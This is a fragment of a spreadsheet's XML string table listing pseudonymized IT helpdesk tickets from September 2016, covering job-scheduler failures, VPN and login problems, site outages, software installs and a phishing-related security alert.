  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hoti failed in job_scheduler at: 09/11/2016 14:21:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bk_hana_SID_62_os_wly_dp failed in job_scheduler at: 09/11/2016 13:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_hana_SID_62_os_wly_dp failed in job_scheduler at: 09/11/2016 13:21:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bk_hana_SID_22_os_wly failed in job_scheduler at: 09/11/2016 11:18:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_hana_SID_22_os_wly failed in job_scheduler at: 09/11/2016 11:18:00</t>
  </si>
  <si>
    <t>vip 1 - how can i change my password remotely? i'm traveling and it expires in 2 days.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yxvqdtmk.kbicqjrp@gmail.com_x000D_
_x000D_
sent from mail&lt;_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>yxvqdtmk kbicqjrp</t>
  </si>
  <si>
    <t>not able to access to t or p drives</t>
  </si>
  <si>
    <t>name:cighytol yjurztgd
language:
browser:microsoft internet explorer
email:cighytol.yjurztgd@gmail.com
customer number:
telephone:
summary:hello, closing down my laptop and starting vpn again has not solved the issue.  i do not have access to t or p drives today.  teams and global.  i can't do any work until this access is restored.  please help.</t>
  </si>
  <si>
    <t>cighytol yjurztgd</t>
  </si>
  <si>
    <t>ms office 2016 installation</t>
  </si>
  <si>
    <t xml:space="preserve">ms office 2016 installation
contact no:- </t>
  </si>
  <si>
    <t xml:space="preserve">power supplied failed on library 2. </t>
  </si>
  <si>
    <t xml:space="preserve">from: timnhyt rehtyulds 
sent: sunday, september 11, 2016 7:14 am
to: datacenter
cc: -dacl3
subject: re: qa* cold backups
</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1010 : the service is down after the weekend reboot (erpstartsrv.exe) </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_579 failed in job_scheduler at: 09/11/2016 07:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_579 failed in job_scheduler at: 09/11/2016 07:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">job co_val_update_crosscomp failed in job_scheduler at: 09/11/2016 06:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job co_val_update_crosscomp failed in job_scheduler at: 09/11/2016 06:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_1_regen failed in job_scheduler at: 09/11/2016 05:41:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_1_regen failed in job_scheduler at: 09/11/2016 05:41:00</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_2_regen failed in job_scheduler at: 09/11/2016 05:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_2_regen failed in job_scheduler at: 09/11/2016 05:36:00</t>
  </si>
  <si>
    <t>network outage:   malaysia site hard down since 12:41 am et on 09/11.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________12:41 am et on 09/11______________x000D_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____yes__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</si>
  <si>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HostName_894 : c:\ label:sys-HostName_894 28385a7b on server: HostName_894 is over  85% space consumed. space available: 4.4 g</t>
  </si>
  <si>
    <t>restoring ppt</t>
  </si>
  <si>
    <t>navfgybz fuavxjzk</t>
  </si>
  <si>
    <t>erp login-password issue.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ojgfmvep.zbatowgi@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
facing erp login problem. password issue._x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1148 failed in job_scheduler at: 09/11/2016 01:27:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1148 failed in job_scheduler at: 09/11/2016 01:27:00</t>
  </si>
  <si>
    <t xml:space="preserve">job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 09/11/2016 00:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 09/11/2016 00:11:00</t>
  </si>
  <si>
    <t>engineering_tool installation, ms office 2016 installation, vpn access, erp access.</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_39cold failed in job_scheduler at: 09/78.93.52.6799:58:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_39cold failed in job_scheduler at: 09/78.93.52.6799:58:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_36cold failed in job_scheduler at: 09/78.93.52.6798:13:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_36cold failed in job_scheduler at: 09/78.93.52.6798:13:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_7cold failed in job_scheduler at: 09/78.93.52.6798:14:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_7cold failed in job_scheduler at: 09/78.93.52.6798:14:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_749 failed in job_scheduler at: 09/78.93.52.6795:43:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_749 failed in job_scheduler at: 09/78.93.52.6795:43:00</t>
  </si>
  <si>
    <t xml:space="preserve">hi liuytre,_x000D_
_x000D_
sorry to hear of the issues with ethics and vpn that you're experiencing._x000D_
_x000D_
you do have access to vpn now and should be able to connect through _x000D_
_x000D_
also, please could you share the error you have when trying to get into ethics. i understand there was a change in your employment status which might be contributing to it but will need to confirm. please share when the changes took place and the error message._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ethics issue</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to vpn </t>
  </si>
  <si>
    <t>power outage:jundiai - (company):company-sifco-jundiai-rtr circuit is down since at 7:27 am et on 09/10.no backup</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____na_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____7:27 am et on 09/10__________________x000D_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</si>
  <si>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the dynamics crm url checks is reporting a : down status on, company-crm-sp-mfg_tooltion.azurewebsites.net.</t>
  </si>
  <si>
    <t xml:space="preserve">observing below alert in monitoring_tool since 06:33 am et on 09/10._x000D_
_x000D_
application "dynamics crm url checks" on node "company-crm-sp-mfg_tooltion.azurewebsites.net" is down </t>
  </si>
  <si>
    <t>ap vpn is not getting connected</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dargthy.sohfyuimaiah@company.com
ap vpn is not getting connected. please assist at an earliest. </t>
  </si>
  <si>
    <t>circuit outage:usa:secondary vpn circuit is down since at 5:51 am et on 09/10.site have backup .</t>
  </si>
  <si>
    <t>what type of outage:  _____network     _x____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______5:51 am et on 09/10________________x000D_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_yes_____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___yes_____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</si>
  <si>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Job_1427 failed in job_scheduler at: 09/10/2016 04:07:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1427 failed in job_scheduler at: 09/10/2016 04:07:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1348 failed in job_scheduler at: 09/10/2016 03:55:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1348 failed in job_scheduler at: 09/10/2016 03:55:00</t>
  </si>
  <si>
    <t>unable to print production orders : error : production_order_interface_vendor-connc-bng</t>
  </si>
  <si>
    <t>unable to print production orders since last 1 hour._x000D_
user was doing half day and mentioned that he will contact again on monday for this issue._x000D_
not sure if rest of users in india plant facing same issue._x000D_
collated information for issue with screenshot and assigning to concern team._x000D_
_x000D_
_x000D_
connection to system production_order_interface_app-bng with destination production_order_interface_vendor-connc-bng is not okay.</t>
  </si>
  <si>
    <t>yjkalmbr jsdyzivq</t>
  </si>
  <si>
    <t>account lcoked out.</t>
  </si>
  <si>
    <t>389_x000D_
summary:password change is locked. need to change all password</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_577 failed in job_scheduler at: 09/10/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_577 failed in job_scheduler at: 09/10/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_549 failed in job_scheduler at: 09/09/2016 23:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_549 failed in job_scheduler at: 09/09/2016 23:02:00</t>
  </si>
  <si>
    <t>clientless vpn is not working</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qklrdoba.qxivmbts@gmail.com
hello,
                greetings of the day.
please note that the clientless vpn is not working in my system, below details are for your kind information only:
user id       : sarhytukas
system id : awyl9326112
please find below the snaps i am receiving while trying to use vpn
[cid:image002.jpg@01d20b3d.0d85d170]
[cid:image006.jpg@01d20b3d.0d85d170]
please do the needful.
</t>
  </si>
  <si>
    <t>qklrdoba qxivmbts</t>
  </si>
  <si>
    <t>network outage: apac , site hard down since 7:29 pm et on 9/9/2016. no backup.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________7:29 pm et on 9/9/2016______________x000D_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_no_____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ____na____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____no_____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______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</si>
  <si>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SID_46filesys failed in job_scheduler at: 09/09/2016 22:04:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_46filesys failed in job_scheduler at: 09/09/2016 22:04:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bk_hana_SID_62_erp_dly_dp failed in job_scheduler at: 09/09/2016 22:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_hana_SID_62_erp_dly_dp failed in job_scheduler at: 09/09/2016 22:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1348b failed in job_scheduler at: 09/09/2016 18:10:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1348b failed in job_scheduler at: 09/09/2016 18:10:00</t>
  </si>
  <si>
    <t>skype login issue.</t>
  </si>
  <si>
    <t xml:space="preserve">skype login issue._x000D_
-connected to the user system using teamviewer._x000D_
-help the user login to the skype._x000D_
-issue resolved._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">no audio while on skype meeting </t>
  </si>
  <si>
    <t>no audio while on skype meeting</t>
  </si>
  <si>
    <t>confidential - project x update - outlook issue with displaying an image in the meeting invite (ms project image, png im</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kehtxprg.uekapfzt@gmail.com_x000D_
_x000D_
hello company it help,_x000D_
_x000D_
for some reason the image in the invitations does not show up, as you can see below. the only think is this [!oc([1033])!]_x000D_
_x000D_
is this an issue on my end how outlook is setup or something from the sender side?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_577 failed in job_scheduler at: 09/09/2016 16:50:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_577 failed in job_scheduler at: 09/09/2016 16:50:00</t>
  </si>
  <si>
    <t>the odbc connection to glovia-old no longer works to access glovia data</t>
  </si>
  <si>
    <t xml:space="preserve"> access can no longer connect to dsn=glovia-old.  we need this connection to obtain archived data.  please assign to keyhtyvin toriaytun.</t>
  </si>
  <si>
    <t>emails not updating in outlook</t>
  </si>
  <si>
    <t>gvmqopuz vbpsxdhf</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_553 failed in job_scheduler at: 09/09/2016 15:18:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_553 failed in job_scheduler at: 09/09/2016 15:18:00</t>
  </si>
  <si>
    <t>update office to 64 bit</t>
  </si>
  <si>
    <t>name:kvrmnuix yicpojmf
language:
browser:microsoft internet explorer
email:kvrmnuix.yicpojmf@gmail.com
customer number:
telephone:
summary:update office to 64-bit</t>
  </si>
  <si>
    <t>skype error</t>
  </si>
  <si>
    <t>zfdkqgmt zvqxcodk</t>
  </si>
  <si>
    <t>unable to submit a discount form</t>
  </si>
  <si>
    <t>blank call // gso</t>
  </si>
  <si>
    <t>please install project 2013 back on the clients pc</t>
  </si>
  <si>
    <t xml:space="preserve">in engineering tool, when i try to create a new task, some of the options are not being displayed.. </t>
  </si>
  <si>
    <t xml:space="preserve">in engineering tool, when i try to create a new task, some of the options are not being displayed.. _x000D_
_x000D_
please refer the attachment </t>
  </si>
  <si>
    <t>pyamiwvx terscahn</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3194 failed in job_scheduler at: 09/09/2016 14:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3194 failed in job_scheduler at: 09/09/2016 14:15:00</t>
  </si>
  <si>
    <t>supply_chian_mgmt_tool password reset.</t>
  </si>
  <si>
    <t>lauacyltoe hxgaycze java to be installed</t>
  </si>
  <si>
    <t>chg0034110</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: afkstcev.utbnkyop@gmail.com
hello everyone
users will receive a message to logon to 
afkstcev utbnkyop
senior analyst, bokrgadu euobrlcn
afkstcev.utbnkyop@gmail.com&lt;mailto:afkstcev.utbnkyop@gmail.com&gt;
</t>
  </si>
  <si>
    <t>ticket update inplant_858871</t>
  </si>
  <si>
    <t>user needs access to the engineering_tool.</t>
  </si>
  <si>
    <t>sjhrytwn yakzbslm</t>
  </si>
  <si>
    <t xml:space="preserve">unable to add contacts to markhtyeting list to receive catalogs in crm </t>
  </si>
  <si>
    <t xml:space="preserve">unable to add contacts to markhtyeting list to receive catalogs in crm
user id - kindftyed
contact no - 
</t>
  </si>
  <si>
    <t xml:space="preserve"> incident #in33541962 - phishing form submit - outbound beshryulisted ip - dane-williuthyr</t>
  </si>
  <si>
    <t xml:space="preserve">source ip: 10.38.93.30
source hostname: dane-williuthyr
user  name: dghuane whryuiams (wijuiidl)
location : usa pa eh
sep , sms status : n/a
field sales user ( yes / no) : no
dsw event log: see below
**
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1) full escalation for related events (high priority ticket and a phone call).
2) autoresolve events to the portal (no explicit notification but events will be available for reporting purposes in the portal).
sincerely,
 ctoc
=========================
event data
=========================
event id: 304247119
event summary: [ipbl]: phishing form submit - outbound beshryulisted ip
occurrence count: 1
event count: 1
host and connection information
source ip: 10.38.93.30
source hostname: dane-williuthyr
source mac address: 28:5a:eb:51:db:f0
destination ip: 107.180.41.85
destination hostname: ip-107-180-41-85.ip.secureserver.net.
destination ip geolocation: schtrtgoyhtsdale, usa
connection directionality: outgoing
device information
device ip: 18.79.63.203
device name: company-internal-asa.company.com-1
scwx event processing information
sherlock rule id (sle): 701525
inspector event id: 031724385
agent id: 103611
event detail:
aug 8 13:11:36 18.79.63.203 %asa-6-302013: built outbound tcp connection 2173940377 for outside:107.180.41.85/80 (107.180.41.85/80) to inside:10.38.93.30/58345 (12.161.199.50/14084)
[correlation_data]
aug 8 06:46:44 27.38.93.278 dhcpd[2261]: dhcpack on 10.38.93.30 to 28:5a:eb:51:db:f0 (dane-williuthyr) via eth1 relay 10.38.92.1 lease-duration 604800 (renew)
take action
ticket action:
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1427 failed in job_scheduler at: 09/09/2016 13:39:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1427 failed in job_scheduler at: 09/09/2016 13:39:00</t>
  </si>
  <si>
    <t>reparo adobe pdf</t>
  </si>
  <si>
    <t>os recibo gerados em pdf estÃ£o saindo com caracteres.</t>
  </si>
  <si>
    <t>frjpkuwq rtznexbq</t>
  </si>
  <si>
    <t>design_tool service: file naming convention has changed</t>
  </si>
  <si>
    <t xml:space="preserve">the geengineering_tooloductdata web service calls the design_tool service to obtain cad models for engineering_tool._x000D_
i believe this link points to the design_tool uacyltoe hxgaycze service: _x000D_
_x000D_
looks like the naming convention has changed in the last few days and files returned by this service are being named with just the materials_management number._x000D_
(e.g. mm 7304975 in SID_34. see the attached fw  engineering_tool drills.msg for more details)_x000D_
_x000D_
the change is causing issues with models not being returned to  engineering_tool._x000D_
engineering_tool will be demoed at imts starting on monday the 12th. _x000D_
need an urgent fix to revert any changes that might have been made to the file naming convention for files from the design_tool service._x000D_
_x000D_
below are the original rules uli had implemented for file names for cad files returned by this service._x000D_
here are the implemented naming rules:_x000D_
_x000D_
â€¢ if there is a cad_catalog_iso it's taken, _x000D_
o else if there is a cad_catalog_ansi it's taken,_x000D_
ï‚§ else rqfhiong zkwfqagb is taken_x000D_
â€¢ an underscore plus cad_graph_type is added _x000D_
â€¢ finally the original file extension is added_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ticket update on inplant_858893</t>
  </si>
  <si>
    <t>dell 7350 tablet cracked after it was accidentally dropped.</t>
  </si>
  <si>
    <t>dell 7350 tablet cracked after it was accidentally dropped</t>
  </si>
  <si>
    <t>approval workflow problems</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
i am approfghaching you, as we have problems with our approval workflow for credit memo requests respectively rmas._x000D_
i opened several tickets regarding this topic, which unfortunately did not lead to a final solution._x000D_
maybe it is a (erp-) language problem for my part._x000D_
anyway, i  hope, that you can help to get this fixed._x000D_
_x000D_
the approval levels for our organization are as follows (regardless who is the sales person in customer account)_x000D_
level 1 (1.000â‚¬-4.999â‚¬): jwqyxbzs adpvilqu (afcbrhqw vudghzcb as subsitute, if possible)_x000D_
level 2 (5.000â‚¬-9.999â‚¬): jwqyxbzs adpvilqu (afcbrhqw vudghzcb as substitute if possible)_x000D_
level 3 (10.000â‚¬-24.999â‚¬): qsoxltny dzjespml (tjnwdauo jkdwbhgs as substitute if possible)_x000D_
level 4 (25.000â‚¬ plus): michghytuael rÃ¼nz (tjnwdauo jkdwbhgs as substitute if possible)_x000D_
_x000D_
it often happens, that these workflows are routed to the wrong person._x000D_
lauacyltoe hxgaycze example: rma 7611183856 was routed to me at level 1 and approved, but then to jmkcewds qkoipbzn at level 2, wo has nothing to do with it._x000D_
_x000D_
it takes a lot of time, to gather the wrong routed workflows and to forward them to the responsible person._x000D_
_x000D_
i appreciate your help._x000D_
</t>
  </si>
  <si>
    <t>sound not working</t>
  </si>
  <si>
    <t>erp will not open</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nkthumgf.mwgdenbs@gmail.com
hi,
is erp down for vpn users?  i keep getting this error every time i try to log on to SID_34.  i was in erp @ 2 hrs ago with no troubles.  please help.
[cid:image001.png@01d20a93.c5047641]
nkthumgf mwgdenbs
nkthumgf.mwgdenbs@gmail.com&lt;mailto:nkthumgf.mwgdenbs@gmail.com&gt;
ph: 
</t>
  </si>
  <si>
    <t>update on inplant_857663</t>
  </si>
  <si>
    <t>i'm trying to print to our network printer  savin c2525</t>
  </si>
  <si>
    <t>dzrbwhco frmhpwda</t>
  </si>
  <si>
    <t>i was kicked out of vpn but i am reconnected now.</t>
  </si>
  <si>
    <t>vpn stopped working but i was able to reconnected after a few minutes.</t>
  </si>
  <si>
    <t>lxvpesjo azmqlfoi</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1348a failed in job_scheduler at: 09/09/2016 11:10:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1348a failed in job_scheduler at: 09/09/2016 11:10:00</t>
  </si>
  <si>
    <t>error when logging in to hana</t>
  </si>
  <si>
    <t>please see attached error that i receive when trying to log in to hana</t>
  </si>
  <si>
    <t>ksmjylwg syihalqv</t>
  </si>
  <si>
    <t xml:space="preserve">i am locked out of global view prtgghj4k. i need my password reset. this is very urgent as i have payroll reports i must pull </t>
  </si>
  <si>
    <t>i am locked out of global view prtgghj4k. i need my password reset. this is very urgent as i have payroll reports i must pull from there this morning.</t>
  </si>
  <si>
    <t>windows password reset for tinmuym alrthyu</t>
  </si>
  <si>
    <t>ltcl8513156 - hgmx5q1 - e6420</t>
  </si>
  <si>
    <t>rarty has this old laptop that he needs to login to but cannot when it is connected to the network. error: security database on the server does not have a computer account for this workstation trust relationship ...
he can once its not connected with an old password. he needs to play some cds and his new laptop does not have a cd drive. 
please see why this laptop cannot be found in ad. 
ph: 5446</t>
  </si>
  <si>
    <t xml:space="preserve">skype audio is not working </t>
  </si>
  <si>
    <t>vpn vpn is not working, need urgent help</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bmudkpie.qolrvbip@gmail.com_x000D_
_x000D_
[cid:image001.png@01d20aae.bff38300]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>hr_engineering_tools - unable to run reports from etime</t>
  </si>
  <si>
    <t>unable to run reports from etime</t>
  </si>
  <si>
    <t>unable to launch business_client - .net framdntyework needs to be installed</t>
  </si>
  <si>
    <t>initiated the download of .net 4.5.2</t>
  </si>
  <si>
    <t>pxcvrjfq wkdaevfn</t>
  </si>
  <si>
    <t>unlocked the account. todd was able to get in successfully</t>
  </si>
  <si>
    <t>unable to launch skype</t>
  </si>
  <si>
    <t>unable to log into skype</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: muywpnof.prtikusy@gmail.com_x000D_
_x000D_
hello,_x000D_
                i am getting an error trying to log into skype.  my address is correct, log in id is correct, and password is correct and have tried a few times and get the same error.  what do i need to do be able to log into skype._x000D_
</t>
  </si>
  <si>
    <t>account number incorrect : urgent ,</t>
  </si>
  <si>
    <t xml:space="preserve">trurthyuft,_x000D_
_x000D_
per our converstion and shatryung of my screen on teamviewer this morning below is a screen shot of the account issue._x000D_
_x000D_
if you look at opportstorage_product number mdoSID_3487210 it has the correct account number for the customer 81211699.  that opp was created on 7/13/16 and there was no problem selecting that correct account number._x000D_
_x000D_
all of the other opportunities were created more recently (after 8/15/16) and i was only able to choose account number 81991714, which is not the correct account number._x000D_
_x000D_
i need to close these out today as won._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">erp engineering tool locked out </t>
  </si>
  <si>
    <t>ptjahcfz kwaqblxp</t>
  </si>
  <si>
    <t>bahdqrcs xvgzdtqj's onbankrding experience</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xzupryaf.vlbikhsm@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
bahdqrcs xvgzdtqj was an intern that we hired on full-time effective aug. 16th. we followed the process of having her old manager transfer her to her new manager in oneteam and then her new manager entered her new job and compensation information like he's been instructed to. however, i have to be honest, her onbankrding experience has been a disaster so far. she says that every time she calls hrss to help her out, they are not very helpful or resolve her issues. hrss will tell her it's an "it problem" and it will tell her that it's an "hr problem." here are some of the issues that she's still having:_x000D_
_x000D_
_x000D_
1.      no access to benefit information on collaboration_tool â€“ when she follows the directions that she was given, she gets an error message that says "needs approval, request has been submitted."_x000D_
_x000D_
2.      no ethics access_x000D_
_x000D_
3.      no expense report access â€“ she was able to enter her expense report, however when she went to submit it she got an error message and now when she tries to log-in, she gets an error message. it said that this is an it problem._x000D_
_x000D_
4.      no access to the vpn â€“ again, it said that hr needs to update the SID_34? i'm not really sure what that is._x000D_
_x000D_
5.      incorrect paychecks â€“ she did not receive a paycheck on 8/30. i told her that depending when her information was processed, payroll might not have caught the fact that she's salary now and then it should all be corrected on her 9/15 paycheck. sharee emailed her yesterday and made it sound like everything was going to be corrected on her 9/15 paycheck, but then sent a follow-up email saying that because u2 already ran, she was not going to be able to backdate and the effective date for this change was going to have to be 9/1. she wants liuytre to provide her hours worked from 8/18 â€“ 8/31. this is not going to work because liuytre stopped tracking her hours since she is now a salaried employee. she was also at a company conference the week of 8/22 and "technically" worked way more than 40 hours that week because she was part of meetings, dinners and after hours' team building activities._x000D_
_x000D_
can someone from it and shared services be her "designated" contact and work with her through these issues until everything is figured out? if something is an it issue, can hrss follow-up with it so she's not being passed back and forth? she is beyond frustrated and only has until next friday to figure out her benefits before her eligibility timeframdntye is up._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>password reset erp SID_34</t>
  </si>
  <si>
    <t>tcekvfrb colkzbrm</t>
  </si>
  <si>
    <t>interface: fc3/34 Â· HostName_1147 on sandplant_162 is down since 7:38 am on 09/09 et</t>
  </si>
  <si>
    <t xml:space="preserve">vpn queries </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: marhty.financial@company.com
hello:
i get the following error when i try to start vpn.  also, if i try to do the install it says i need admin rights.
[cid:image001.png@01d20a6f.7ac627e0]
best </t>
  </si>
  <si>
    <t xml:space="preserve">please take snapshot of vms manually under HostName_589 </t>
  </si>
  <si>
    <t xml:space="preserve">skype content not showing up in meeting </t>
  </si>
  <si>
    <t>error: trust relationship between this workstation and the primary domain failed</t>
  </si>
  <si>
    <t>email:oewshlmd.azjfshry@gmail.com
customer number:
telephone:
summary: when i am away from my computer for a length of time, or sometimes at start up i am getting the following error message "the trust relationship between this workstation and the primary domain failed." it is a pain to keep having to totally reboot my computer when i am away from my desk for a time.</t>
  </si>
  <si>
    <t>oewshlmd azjfshry</t>
  </si>
  <si>
    <t>skype - meetinmg button</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: blktuiae.jzakfmhw@gmail.com
dear it
i lost my skpe-button
view of a colleagues
[cid:image001.png@01d20a9c.2d7e8d10][cid:image002.png@01d20a9c.2d7e8d10]
my view
[cid:image003.png@01d20a9c.2d7e8d10]
gÃ¼nter webfnhtyer
manager  sourcing
blktuiae.jzakfmhw@gmail.com&lt;mailto:blktuiae.jzakfmhw@gmail.com&gt;
company shared services gmbh
geschÃ¤ftsfÃ¼hrer:  phvkowml azbtkqwx, naruedlk mpvhakdq
</t>
  </si>
  <si>
    <t>outlook not loading.</t>
  </si>
  <si>
    <t>finance_app time out error.</t>
  </si>
  <si>
    <t>ltnivuhw zbudwnfr</t>
  </si>
  <si>
    <t>noxazrmy zrudycla</t>
  </si>
  <si>
    <t>account extension for fqiurzas eidtfbqk - vvlfbhtyeisd</t>
  </si>
  <si>
    <t>account extension for fqiurzas eidtfbqk - vvlfbhtyeisd
extend the account for another six months.</t>
  </si>
  <si>
    <t>kmbfhyxi cuwgmiop</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_ms_cluster_inc failed in job_scheduler at: 09/09/2016 06:35:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_ms_cluster_inc failed in job_scheduler at: 09/09/2016 06:35:00</t>
  </si>
  <si>
    <t>audio stop working after company update</t>
  </si>
  <si>
    <t xml:space="preserve">audio device stoped working after company update , show the message "no audio output device is installed", _x000D_
more coworkers have had this trouble. _x000D_
</t>
  </si>
  <si>
    <t>gsotqxfi lidunfjg</t>
  </si>
  <si>
    <t>unable to login to vcenter HostName_589 through vsphere client</t>
  </si>
  <si>
    <t>unable to login to vcenter HostName_589 through vsphere client. kindly check the issue.</t>
  </si>
  <si>
    <t>unable to create delivery - shipments iak</t>
  </si>
  <si>
    <t>please provide the following:_x000D_
_x000D_
what order number? _x000D_
_x000D_
what material or item number? 4752761_x000D_
_x000D_
what warehouse location? apac_x000D_
_x000D_
issue description / error message? please check attached</t>
  </si>
  <si>
    <t>uyjlodhq ymedkatw (lghuiezj3) has mapped the units m (departments), n (public) and s (teams) to the wrong server</t>
  </si>
  <si>
    <t xml:space="preserve">uyjlodhq ymedkatw (lghuiezj3) has mapped the units m (departments), n (public) and s (teams) to the wrong server. she would have these units on HostName_622_x000D_
pc name: ekxw8111221_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>usb ports not detecting devices</t>
  </si>
  <si>
    <t>hotwlygp afukzhnm</t>
  </si>
  <si>
    <t>ewel8323721 - konto einlegen.</t>
  </si>
  <si>
    <t>ewel8323721 - konto einlegen _x000D_
_x000D_
assigning it yevirgnl ylhogjct per ughzilfm cfibdamq.</t>
  </si>
  <si>
    <t>travel expense manager (erp transaction pr05) not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bmudkpie.qolrvbip@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
travel expense manager (erp transaction pr05) not working anylonger ?_x000D_
_x000D_
can't start it, s. below._x000D_
_x000D_
[cid:image001.png@01d20a8a.c63eba50]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>query from ; avmeocnk.mvycfwka@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve"> e-mail has been sent to the company quarantine database</t>
  </si>
  <si>
    <t>banwdfcu uhlyqwrt</t>
  </si>
  <si>
    <t xml:space="preserve">kabel vga defekt\ zedlet </t>
  </si>
  <si>
    <t>install kis \ewew8323506 \guvgytniak</t>
  </si>
  <si>
    <t>install kis \ewew8323504 \zlqfptjx xnklbfua</t>
